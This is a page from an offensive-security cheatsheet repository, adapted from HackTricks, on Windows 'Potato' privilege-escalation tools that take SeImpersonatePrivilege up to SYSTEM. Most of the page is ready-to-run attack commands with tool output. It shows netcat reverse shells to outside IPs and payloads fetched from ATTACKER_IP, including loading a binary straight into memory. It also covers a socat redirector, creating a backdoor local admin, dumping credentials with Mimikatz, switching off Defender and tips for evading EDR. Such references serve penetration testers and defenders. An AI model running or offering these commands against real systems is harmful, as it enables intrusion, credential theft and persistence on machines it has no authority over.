daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

roguepotato-and-printspoofer.md (13259B)


      1 ---
      2 title: "RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
     14 
     15 > [!WARNING]
     16 > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
     17 
     18 > [!TIP]
     19 > A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References.
     20 
     21 Related pages for background and manual techniques:
     22 
     23 [Seimpersonate From High To System](/hacktricks/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system)
     24 
     25 [From High Integrity To System With Name Pipes](/hacktricks/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes)
     26 
     27 [Privilege Escalation Abusing Tokens](/hacktricks/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens)
     28 
     29 ## Requirements and common gotchas
     30 
     31 All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
     32 
     33 - SeImpersonatePrivilege (most common) or SeAssignPrimaryTokenPrivilege
     34 - High integrity is not required if the token already has SeImpersonatePrivilege (typical for many service accounts such as IIS AppPool, MSSQL, etc.)
     35 
     36 Check privileges quickly:
     37 
     38 ```batch
     39 whoami /priv | findstr /i impersonate
     40 ```
     41 
     42 Operational notes:
     43 
     44 - If your shell runs under a restricted token lacking SeImpersonatePrivilege (common for Local Service/Network Service in some contexts), regain the account’s default privileges using FullPowers, then run a Potato. Example: `FullPowers.exe -c "cmd /c whoami /priv" -z`<sup>[[10]](#references)[[11]](#references)</sup>
     45 - PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
     46 - RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
     47 - EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
     48 - Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
     49 - “Kitchen-sink” forks such as DeadPotato bundle extra payload modules (Mimikatz/SharpHound/Defender off) which touch disk; expect higher EDR detection compared to the slim originals.
     50 
     51 ## Quick Demo
     52 
     53 ### PrintSpoofer
     54 
     55 ```bash
     56 c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
     57 
     58 --------------------------------------------------------------------------------
     59 
     60 [+] Found privilege: SeImpersonatePrivilege
     61 
     62 [+] Named pipe listening...
     63 
     64 [+] CreateProcessAsUser() OK
     65 
     66 NULL
     67 
     68 ```
     69 
     70 Notes:
     71 - You can use -i to spawn an interactive process in the current console, or -c to run a one-liner.
     72 - Requires Spooler service. If disabled, this will fail.
     73 
     74 ### RoguePotato
     75 
     76 ```bash
     77 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
     78 # In some old versions you need to use the "-f" param
     79 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
     80 ```
     81 
     82 If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector:<sup>[[9]](#references)</sup>
     83 
     84 ```bash
     85 # On attacker redirector (must listen on TCP/135 and forward to victim:9999)
     86 socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
     87 
     88 # On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
     89 RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
     90 ```
     91 
     92 ### PrintNotifyPotato
     93 
     94 PrintNotifyPotato is a newer COM abuse primitive released in late 2022 that targets the **PrintNotify** service instead of Spooler/BITS. The binary instantiates the PrintNotify COM server, swaps in a fake `IUnknown`, then triggers a privileged callback through `CreatePointerMoniker`. When the PrintNotify service (running as **SYSTEM**) connects back, the process duplicates the returned token and spawns the supplied payload with full privileges.<sup>[[13]](#references)</sup>
     95 
     96 Key operational notes:
     97 
     98 * Works on Windows 10/11 and Windows Server 2012–2022 as long as the Print Workflow/PrintNotify service is installed (it is present even when the legacy Spooler is disabled post-PrintNightmare).
     99 * Requires the calling context to hold **SeImpersonatePrivilege** (typical for IIS APPPOOL, MSSQL, and scheduled-task service accounts).
    100 * Accepts either a direct command or an interactive mode so you can stay inside the original console. Example:
    101 
    102   ```cmd
    103   PrintNotifyPotato.exe cmd /c "powershell -ep bypass -File C:\ProgramData\stage.ps1"
    104   PrintNotifyPotato.exe whoami
    105   ```
    106 
    107 * Because it is purely COM-based, no named-pipe listeners or external redirectors are required, making it a drop-in replacement on hosts where Defender blocks RoguePotato’s RPC binding.
    108 
    109 Operators such as Ink Dragon fire PrintNotifyPotato immediately after gaining ViewState RCE on SharePoint to pivot from the `w3wp.exe` worker to SYSTEM before installing ShadowPad.<sup>[[14]](#references)</sup>
    110 
    111 ### SharpEfsPotato
    112 
    113 ```bash
    114 > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
    115 SharpEfsPotato by @bugch3ck
    116   Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
    117 
    118   Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
    119 
    120 [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
    121 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
    122 [x]RpcBindingSetAuthInfo failed with status 0x6d3
    123 [+] Server connected to our evil RPC pipe
    124 [+] Duplicated impersonation token ready for process creation
    125 [+] Intercepted and authenticated successfully, launching program
    126 [+] Process created, enjoy!
    127 
    128 C:\temp>type C:\temp\w.log
    129 nt authority\system
    130 ```
    131 
    132 ### EfsPotato
    133 
    134 ```bash
    135 > EfsPotato.exe "whoami"
    136 Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
    137 Part of GMH's fuck Tools, Code By zcgonvh.
    138 CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
    139 
    140 [+] Current user: NT Service\MSSQLSERVER
    141 [+] Pipe: \pipe\lsarpc
    142 [!] binding ok (handle=aeee30)
    143 [+] Get Token: 888
    144 [!] process with pid: 3696 created.
    145 ==============================
    146 [x] EfsRpcEncryptFileSrv failed: 1818
    147 
    148 nt authority\system
    149 ```
    150 
    151 Tip: If one pipe fails or EDR blocks it, try the other supported pipes:
    152 
    153 ```text
    154 EfsPotato <cmd> [pipe]
    155   pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
    156 ```
    157 
    158 ### GodPotato
    159 
    160 ```bash
    161 > GodPotato -cmd "cmd /c whoami"
    162 # You can achieve a reverse shell like this.
    163 > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
    164 ```
    165 
    166 Notes:
    167 - Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
    168 - Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022).
    169 - If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command.<sup>[[12]](#references)</sup>
    170 
    171 Quick staging pattern from a writable IIS webroot:
    172 
    173 ```powershell
    174 iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe
    175 iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1  # contains your revshell
    176 ./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1"
    177 ```
    178 
    179 ### DCOMPotato
    180 
    181 ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
    182 
    183 DCOMPotato provides two variants targeting service DCOM objects that default to RPC_C_IMP_LEVEL_IMPERSONATE. Build or use the provided binaries and run your command:
    184 
    185 ```batch
    186 # PrinterNotify variant
    187 PrinterNotifyPotato.exe "cmd /c whoami"
    188 
    189 # McpManagementService variant (Server 2022 also)
    190 McpManagementPotato.exe "cmd /c whoami"
    191 ```
    192 
    193 ### SigmaPotato (updated GodPotato fork)
    194 
    195 SigmaPotato adds modern niceties like in-memory execution via .NET reflection and a PowerShell reverse shell helper.<sup>[[8]](#references)</sup>
    196 
    197 ```powershell
    198 # Load and execute from memory (no disk touch)
    199 [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
    200 [SigmaPotato]::Main("cmd /c whoami")
    201 
    202 # Or ask it to spawn a PS reverse shell
    203 [SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
    204 ```
    205 
    206 Additional perks in 2024–2025 builds (v1.2.x):
    207 - Built-in reverse shell flag `--revshell` and removal of the 1024-char PowerShell limit so you can fire long AMSI-bypassing payloads in one go.
    208 - Reflection-friendly syntax (`[SigmaPotato]::Main()`), plus a rudimentary AV evasion trick via `VirtualAllocExNuma()` to throw off simple heuristics.
    209 - Separate `SigmaPotatoCore.exe` compiled against .NET 2.0 for PowerShell Core environments.
    210 
    211 ### DeadPotato (2024 GodPotato rework with modules)
    212 
    213 DeadPotato keeps the GodPotato OXID/DCOM impersonation chain but bakes in post-exploitation helpers so operators can immediately take SYSTEM and perform persistence/collection without additional tooling.<sup>[[15]](#references)</sup>
    214 
    215 Common modules (all require SeImpersonatePrivilege):
    216 
    217 - `-cmd "<cmd>"` — spawn arbitrary command as SYSTEM.
    218 - `-rev <ip:port>` — quick reverse shell.
    219 - `-newadmin user:pass` — create a local admin for persistence.
    220 - `-mimi sam|lsa|all` — drop and run Mimikatz to dump credentials (touches disk, noisy).
    221 - `-sharphound` — run SharpHound collection as SYSTEM.
    222 - `-defender off` — flip Defender real-time protection (very noisy).
    223 
    224 Example one-liners:
    225 
    226 ```batch
    227 # Blind reverse shell
    228 DeadPotato.exe -rev 10.10.14.7:4444
    229 
    230 # Drop an admin for later login
    231 DeadPotato.exe -newadmin pwned:P@ssw0rd!
    232 
    233 # Run SharpHound immediately after priv-esc
    234 DeadPotato.exe -sharphound
    235 ```
    236 
    237 Because it ships extra binaries, expect higher AV/EDR flags; use the slimmer GodPotato/SigmaPotato when stealth matters.
    238 
    239 ## References
    240 
    241 - [1] [PrintSpoofer – Abusing Impersonation Privileges on Windows 10 and Server 2019](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
    242 - [2] [itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
    243 - [3] [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
    244 - [4] [bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
    245 - [5] [BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
    246 - [6] [zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
    247 - [7] [zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
    248 - [8] [tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
    249 - [9] [No more JuicyPotato? Old story, welcome RoguePotato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
    250 - [10] [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
    251 - [11] [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
    252 - [12] [HTB: Job — LibreOffice macro → IIS webshell → GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
    253 - [13] [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato)
    254 - [14] [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
    255 - [15] [DeadPotato – GodPotato rework with built-in post-ex modules](https://github.com/lypd0/DeadPotato)